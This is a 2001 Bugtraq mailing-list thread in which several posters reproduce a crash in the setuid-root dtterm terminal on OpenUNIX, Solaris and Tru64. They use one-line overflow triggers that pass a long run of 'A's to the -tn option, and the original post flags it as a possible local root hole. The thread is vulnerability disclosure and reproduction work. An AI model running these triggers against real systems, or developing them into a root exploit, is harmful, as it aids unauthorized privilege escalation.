RE: OpenUNIX 8 & Unixware possible local root

[Bob Dog <bobdog () drunk co nz>]

I could reproduce this on True64 5.1 on an AlphaStation
but I had to go all the way to 8203. Using values
below 4590 caused no problems. Starting at values
of 4590 up to 8202 a dtterm window will open normally
and everything seems normal but the 'clear' command
will cause a coredump. However, the teminal window will
still remain active. Other commands don't seem to cause
problems.

$ uname -a
OSF1 red5 V5.1 732 alpha
$ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x8203'`
Memory fault(coredump)

Bob


--- "Cushing, David" <David.Cushing () hitachisoftware com>
> wrote:
> I was able to reproduce this on a Solaris 8 sparc machine with different
> tolerances:
>
> [288] uname -a
> SunOS hostname 5.8 Generic_108528-08 sun4u sparc SUNW,Ultra-60
> [289] /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1083'`
> Segmentation Fault(coredump)
> [297] /usr/dt/bin/dtterm -tn `perl -e 'print "A"x2083'`
> Bus Error(coredump)
> ginger:dcushing[298]=20
>
> -David
>
> > -----Original Message-----
> > From: Aycan Irican [mailto:aycan () mars prosoft com tr]
> > Sent: Tuesday, October 02, 2001 1:55 AM
> > To: bugtraq () securityfocus com
> > Cc: evrim () envy com tr
> > Subject: OpenUNIX 8 & Unixware possible local root
> > =20
> > =20
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> > =20
> > Another dt series bug...
> > =20
> > $ uname -a=20
> > OpenUNIX zen 5 8.0.0 i386 x86at Caldera UNIX_SVR5=20
> > $ id=20
> > uid=3D101(fixxxer) gid=3D1(other)=20
> > $ ls -al /usr/dt/bin/dtterm=20
> > - -r-sr-xr-x 1 root bin 60892 Haz 10 05:03=20
> > /usr/dt/bin/dtterm=20
> > $ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'`=20
> > Warning: Missing charsets in String to FontSet conversion=20
> > Warning: Missing charsets in String to FontSet conversion=20
> > Memory fault=20
> > .. snip ..=20

_____________________________________________________________
Visit these sites today
Blink 182 Fan Site - www.blink182.co.nz
NZ Skateboarding - www.nzskate.com